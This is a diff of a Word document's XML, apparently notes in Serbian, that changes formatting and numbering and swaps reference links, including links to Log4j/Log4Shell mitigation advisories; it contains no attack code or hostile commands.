+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>fajl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>restartovati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>servis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p/>
     <w:p>
-      <w:hyperlink r:id="rId17" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8352,18 +10545,7 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId18" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://www.google.com/search?q=CVE+apache&amp;sca_esv=229f5e211f1b8dd0&amp;udm=7&amp;sxsrf=AE3TifPt8fDMzFRfT-IvGHrXIphP0a_lSg%3A1759003644447&amp;ei=_EPYaPWCG6mGxc8P_IOm8AU&amp;ved=0ahUKEwj18Iqb3_mPAxUpQ_EDHfyBCV4Q4dUDCBA&amp;uact=5&amp;oq=CVE+apache&amp;gs_lp=EhZnd3Mtd2l6LW1vZGVsZXNzLXZpZGVvIgpDVkUgYXBhY2hlMgUQABiABDIGEAAYFhgeMgYQABgWGB4yBhAAGBYYHjIJEAAYFhjHAxgeMgkQABgWGMcDGB4yCRAAGBYYxwMYHjIJEAAYFhjHAxgeMgsQABiABBiGAxiKBTILEAAYgAQYhgMYigVIuDBQAFimKnAAeACQAQCYAf0QoAHcP6oBCTItMS44LTIuMrgBA8gBAPgBAZgCBaACqEDCAggQABiABBiiBMICBRAAGO8FwgIIEAAYExgWGB7CAgsQABgTGBYYxwMYHpgDAJIHCTItMS43LTMuMaAH1BuyBwkyLTEuNy0zLjG4B6hAwgcHMi0yLjIuMcgHOg&amp;sclient=gws-wiz-modeless-video</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:hyperlink r:id="rId19" w:history="1">
+      <w:hyperlink r:id="rId22" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8376,7 +10558,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8389,7 +10571,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId21" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8397,11 +10579,20 @@
           <w:t>https://www.sysdig.com/blog/exploit-detect-mitigate-log4j-cve</w:t>
         </w:r>
       </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">  BITNP</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:sectPr>
@@ -8720,6 +10911,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="26861F1C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="72B06A1E"/>
+    <w:lvl w:ilvl="0" w:tplc="241A0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="241A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="241A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="241A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="241A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="241A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="241A0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="241A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="241A0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="277D288B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1276B0DE"/>
@@ -8868,7 +11172,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="30C94D40"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A4783C66"/>
@@ -9008,7 +11312,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="31DE5A5B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="33B4F3FA"/>
@@ -9148,7 +11452,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3DA94275"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A55AE9DE"/>
@@ -9288,7 +11592,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4E2B14D0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="590221A4"/>
@@ -9428,7 +11732,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5D6E7D17"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="83921A7C"/>
@@ -9568,7 +11872,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5F5C26A1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4FEA31E2"/>
@@ -9708,7 +12012,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="60090536"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2412259C"/>
@@ -9848,7 +12152,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="652A5ACC"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1884CE0C"/>
@@ -9988,7 +12292,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="68345903"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="2E0E3B32"/>
@@ -10129,7 +12433,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1865708930">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1632634527">
     <w:abstractNumId w:val="0"/>
@@ -10138,31 +12442,34 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="273369617">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="677124550">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="5" w16cid:durableId="677124550">
+  <w:num w:numId="6" w16cid:durableId="433785808">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="68626362">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="80876861">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="126318792">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="2084598014">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="433785808">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="7" w16cid:durableId="68626362">
+  <w:num w:numId="11" w16cid:durableId="1088112766">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="80876861">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="9" w16cid:durableId="126318792">
+  <w:num w:numId="12" w16cid:durableId="22751591">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="10" w16cid:durableId="2084598014">
-    <w:abstractNumId w:val="7"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="1088112766">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="22751591">
-    <w:abstractNumId w:val="10"/>
+  <w:num w:numId="13" w16cid:durableId="872034451">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11169,6 +13476,36 @@
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="00564655"/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLPreformattedChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00E21AFB"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
+    <w:name w:val="HTML Preformatted Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="HTMLPreformatted"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00E21AFB"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
